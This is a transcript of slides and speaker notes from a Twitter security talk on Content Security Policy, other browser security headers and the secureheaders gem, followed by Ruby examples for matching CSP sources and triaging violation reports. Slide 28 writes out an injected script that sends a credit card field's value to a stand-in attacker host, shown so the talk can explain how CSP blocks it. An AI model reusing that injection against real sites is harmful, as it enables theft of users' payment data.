Owasp austin
  • My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
  • Content security policy defines what can "run" on a page, and any deviation creates an alert. Twitter was an early adopter. We saw that this could not only potentially protect our users, but also give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed content by leveraging the reports sent to us by the users' browsers. This complements the static and dynamic analysis provided by Brakeman and Phantom Gang in a unique way, as we are receiving information from the user. We send the CSP reports to a central Scribe host (describe: a massively scalable endpoint to collect and aggregate large amounts of data), which writes to the Hadoop file system, which we can run "big data" reports against using Pig/Scalding. We send this information to SADB, where we can search and sort more easily.
  • With the help of whitehats, we tracked down and fixed a lot of these bugs.
  • For example, we can use static analysis to check for common coding problems, dynamic analysis for obvious problems on websites, and maybe CSP to get XSS reports to us sooner.
  • The first is that we believe writing secure code is not just a technical challenge, but also a social one, and tools should be built based on supporting and enhancing existing social processes. Unless it's one person writing, analyzing, and shipping code, communicating about vulnerabilities is just as important as finding them. And effective communication is really hard. We're not talking about emailing a huge report of maybe-bugs to a project manager. We're talking about delivering all of the necessary information to diagnose and fix a vulnerability in a simple and user-centered view.
  • The next principle is about finding and fixing things as quickly as possible. It's not a new idea, but as a guiding principle it leads you to be ruthless about bottlenecks, latencies, and root causes.
  • There are a lot of ways to find security problems, and you get diminishing returns from each. We have tools that live on our servers, tools that live outside our servers, and tools that live in our users' browsers, all meant to catch different types of issues.
  • Most people want to do the right thing. We want to make it easy for them.
  • Take a survey
  • Many of these headers encourage best practices while providing a better user experience and saving resources.
  • Saves resources, since nothing is framed.
  • Twitter has had clickjacking problems in the past. While XFO does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
  • HSTS preload and max-age.
  • Explain how redirecting to HTTPS doesn't protect the initial request; HSTS also saves a round trip.
  • Explain mixed content: MITM of assets, Firesheep, cookies sent in the clear. Supported in WebKit (phantomjs). Accept arbitrary HTML and stay safe, because inserted scripts won't execute: on* events, javascript: URIs; restrict eval.
  • Forms of inline script: script tags, on* events, javascript: hrefs; even mention inline style. As a policy, no inline script should be added; the moratorium on inline script was well received.
  • A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful XSS attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and by a variety of one-off methods.
  • Mention the GitHub blog post. There are a few, mostly well known, ways to solve this: data attributes, blocks of code parsed as JSON. Mention the application of the header.
  • strings or hashes
  • Caching and hosted content concerns
  • Talk about custom elements: being able to attach one-way behavior like framing in a sandbox (solving the clickjackable follow button), HTML/DOM-aware templating, resource integrity.
  • Yeah, some browsers protect you, but not all support it
  • Given that the browsers give us some baked-in security and they take a relatively small amount of effort to implement, why aren't they more common? It's a non-intrusive, easily configured way of ensuring that all requests get the necessary headers applied. We created a gem for Rails applications, and we intend to apply the same logic to our other frameworks as well.
  • Transcript

    • 1. @LASCONATX, April 30, 2013. CSP To the Rescue
    • 2. @LASCONATX April 2013 | @ndm | @SeeEssPee | @sadb | @twittersecurity. It's all about me: I've been called a jackass. I've been called an "appsechole". I have opinions. Opinions are often wrong. Please disagree with me. That's how we learn.
    • 3. CSP, Brakeman, ThreatDeck, Phantom Gang, Roshambo, Email developers, Email security
    • 4. Code review, External reports, Pen testing, Static analysis tools, Dynamic analysis tools, CSP
    • 5. Get the right information to the right people
    • 6. Find bugs as quickly as possible
    • 7. Analyze from many angles
    • 8. Help people help themselves
    • 9. Do you use these? Content security policy, X-Frame-Options, HTTP Strict Transport Security, X-Xss-Protection, X-Content-Type-Options
    • 10. I'm already bored. Time to get awesomer.
    • 11. Security headers: leverage the browser for security
    • 12. Sweeeeet. I don't have to write secure code!
    • 13. Time of convergence
    • 14. Should you?
    • 15. X-Content-Type-Options. Fixes MIME sniffing attacks. Only applies to IE, because only IE would do something like this. X-Content-Type-Options: nosniff. zzzzZZZZZZzzzzz
    • 16. X-Xss-Protection. Use the browser's built-in XSS Auditor. X-Xss-Protection: [0-1](; mode=block)? Example: X-Xss-Protection: 1; mode=block. zzzzZZZ... huh? zzzzzzzz
    • 17. X-Frame-Options. Protects you from most classes of clickjacking. X-Frame-Options: DENY; X-Frame-Options: SAMEORIGIN; X-Frame-Options: ALLOW FROM example.com. zzz... oh hey, that's cool. Don't frame my stuff.
    • 18. X-Frame-Options
    • 19. Firesheep/SSL Strip. Given I don't have an HSTS header, and I have a session, when I visit http://example.com, then I am pwned.
    • 20. Other SSL fails: posting passwords over HTTP, loading mixed content, using protocol-relative URLs
    • 21. Strict Transport Security
    • 22. How hard is it to use? Base case: Strict-transport-security: max-age=10000000. Do all of your subdomains support SSL? Strict-transport-security: max-age=10000000; includeSubdomains
    • 23. Content secur-a-wat? Content security policy is reshaping the security model. It is a complicated spec with great differences across browsers. It is not widely adopted. However! It completely eliminates reflected and stored XSS. It ensures that you never load mixed content. It allows you to accept arbitrary HTML code from users.
    • 24. Wat? Sounds cool. script-src, style-src, img-src, default-src, frame-src, connect-src, font-src, media-src, object-src, report-uri
    • 25. (embedded video)
    • 26. Get rid of XSS, eh? A script-src directive that doesn't contain 'unsafe-inline' almost eliminates most forms of cross-site scripting. I WILL NOT WRITE INLINE JAVASCRIPT.
    • 27. (no text)
    • 28. But I have to... OK, then I'll inject: <script>var image = new Image();image.src = "cyberhacker.com/steal?data=" + $('#credit_card').val();</script> FALSE! img-src violation, no XHR allowed.
    • 29. Inline CSS too? WTF?
    • 30. How to apply? Secure headers! (poor name, I know). Open sourced earlier this year: https://github.com/twitter/secureheaders
    • 31. How does it work? It sets a before_filter that applies each header. Values are based on options passed to the filter, or set in an initializer. Easily overridden. Secure by default!!!
    • 32. What about that security policy thingy? There are > 6 differences between these two header values.
    • 33. Yay for standards: https://t.co/f26WWx3r7y
    • 34. (no text)
    • 35. Long hair don't care. About browser inconsistencies.
    • 36. W3: get involved!!! Key results from the F2F in San Jose.
    • 37. Line numbers and column numbers. Previously, a report that was caused by inline scripts/styles was cryptic. The original FF implementation contained a script-sample. Evals/inserting script into the DOM would be buried in minified JS.
    • 38. "sudo for javascript". Bookmarklets/plugins/etc. How should they behave? Bookmarklets show clear intention. Plugins somewhat questionable. Need to live outside the control of the parent page. But how?
    • 39. Reporting cross-origin. The original implementation did not allow CSP reports to be sent to a URI that does not match the same origin policy, using the eTLD. E.g. https://ads.twitter.com can send reports to https://twitter.com, but not http://twitter.com or https://support.twitter.com or https://twitter.com:3000. As a result of the W3 face to face, the 1.0 spec shall say that reports can be sent anywhere! However, cross-origin requests not allowed by CORS will be "unauthenticated".
    • 40. script-(nonce|hash): the clash of the titans
    • 41. Future
    • 42. You mean there's more on CSP? The browser sends reports!
    • 43. What does the report look like? {"csp-report"=> {"document-uri"=>"http://localhost:3000/home", "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*"}}
    • 44. Quiz: what does this report indicate? {"csp-report"=> {"document-uri"=>"http://example.com/welcome", "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>"http://example.com/welcome", "script-sample"=>"alert(1)", "line-number"=>81, "column-number"=>1463}}
    • 45. Monitor and tune ALL the things
    • 46. Splunk
    • 47. Trending and anomalies
    • 48. (no text)
    • 49. Header status page
    • 50. CSP, Brakeman, ThreatDeck, Phantom Gang, Roshambo, Email developers, Email security
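Slide 28 claims that even an injected script cannot exfiltrate data via an image load when img-src is restricted. The following is an added example, not code from the talk or from the secureheaders gem: a simplified CSP source-list matcher (handles 'self', 'none', scheme sources and host sources with an optional leading wildcard; ports and paths are deliberately ignored) that checks a resource load against a policy, falling back to default-src as the spec does. The policy string, document URL and resource URLs are constructed for the example.

```ruby
require 'uri'

# Parse "default-src 'self'; img-src 'self' https://*.twimg.com" into
# { "default-src" => ["'self'"], "img-src" => ["'self'", "https://*.twimg.com"] }.
def parse_csp(header)
  header.split(';').each_with_object({}) do |directive, policy|
    name, *sources = directive.strip.split
    policy[name] = sources unless name.nil?
  end
end

# Does one source expression permit loading `resource` from `document`?
# Simplification: no port/path matching, no http->https upgrade for host sources.
def source_matches?(source, resource, document)
  case source
  when "'none'" then false
  when "'self'" then resource.scheme == document.scheme && resource.host == document.host
  when /\A[a-z][a-z0-9+.-]*:\z/i then resource.scheme == source.chomp(':').downcase
  else
    m = source.match(%r{\A(?:([a-z][a-z0-9+.-]*)://)?([^/:]+)}i) or return false
    scheme, host = m[1]&.downcase, m[2].downcase
    return false if scheme && scheme != resource.scheme
    if host.start_with?('*.')
      resource.host.end_with?(host[1..])  # "*.twimg.com" matches "abs.twimg.com"
    else
      resource.host == host
    end
  end
end

# The effective directive is the specific one if present, else default-src;
# with neither present the load is unrestricted.
def csp_allows?(policy, directive, resource_url, document_url)
  sources = policy[directive] || policy['default-src']
  return true if sources.nil?
  resource, document = URI(resource_url), URI(document_url)
  sources.any? { |s| source_matches?(s, resource, document) }
end

# Constructed policy in the spirit of slides 26-28: no 'unsafe-inline', images only
# from self and a CDN. The exfiltration image load from slide 28 is denied.
POLICY = parse_csp("default-src 'self'; script-src 'self'; img-src 'self' https://*.twimg.com")
DOC    = 'https://twitter.com/home'
```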
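The speaker notes describe using browser CSP reports to detect XSS and mixed content, and slides 43-44 show two raw reports. As an added example, not Twitter's pipeline code, here is a triage step that classifies reports before they reach a dashboard: developer-machine and browser-extension noise is separated from inline-script violations (the CSP signal for reflected/stored XSS) and from https pages loading http resources (mixed content). The sample reports are constructed; the first two mirror slides 43 and 44.

```ruby
require 'json'
require 'uri'

# Constructed sample reports (JSON as a browser would POST to report-uri).
SAMPLE_REPORTS = [
  '{"csp-report":{"document-uri":"http://localhost:3000/home","referrer":"","blocked-uri":"ws://localhost:35729/livereload","violated-directive":"xhr-src ws://localhost.twitter.com:*"}}',
  '{"csp-report":{"document-uri":"http://example.com/welcome","referrer":"","blocked-uri":"self","violated-directive":"inline script base restriction","source-file":"http://example.com/welcome","script-sample":"alert(1)","line-number":81,"column-number":1463}}',
  '{"csp-report":{"document-uri":"https://example.com/profile","blocked-uri":"http://static.example.com/logo.png","violated-directive":"img-src https:"}}',
  '{"csp-report":{"document-uri":"https://example.com/home","blocked-uri":"chrome-extension://abcdefgh/inject.js","violated-directive":"script-src \'self\'"}}',
]

# Classify one report. Returns the kind plus the fields a developer needs to
# act on it (slide 37: line and column numbers turn cryptic reports into fixes).
def classify_csp_report(raw_json)
  r         = JSON.parse(raw_json).fetch('csp-report')
  doc       = URI(r.fetch('document-uri'))
  blocked   = r['blocked-uri'].to_s
  directive = r['violated-directive'].to_s.split.first.to_s
  location  = [r['source-file'], r['line-number'], r['column-number']].compact.join(':')

  kind =
    if doc.host == 'localhost' || blocked.include?('localhost')
      :dev_noise        # livereload, local dev servers
    elsif blocked.start_with?('chrome-extension://', 'moz-extension://', 'safari-extension://')
      :extension        # user's own browser extensions injecting script
    elsif blocked.empty? || %w[self inline].include?(blocked)
      # Inline content the policy forbade. Older Firefox reported this as
      # blocked-uri "self" with an "inline script ..." directive (slide 44).
      directive.start_with?('style') ? :inline_style : :possible_xss
    elsif doc.scheme == 'https' && blocked.start_with?('http://')
      :mixed_content    # slide 20: loading mixed content
    else
      :policy_violation # an external source the policy does not list
    end

  { kind: kind, directive: directive, blocked: blocked,
    location: location.empty? ? nil : location, sample: r['script-sample'] }
end

# Tally a batch of reports by kind, the shape a trending/anomaly view would consume.
def triage(raw_reports)
  raw_reports.map { |j| classify_csp_report(j) }
             .group_by { |f| f[:kind] }
             .transform_values(&:size)
end
```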
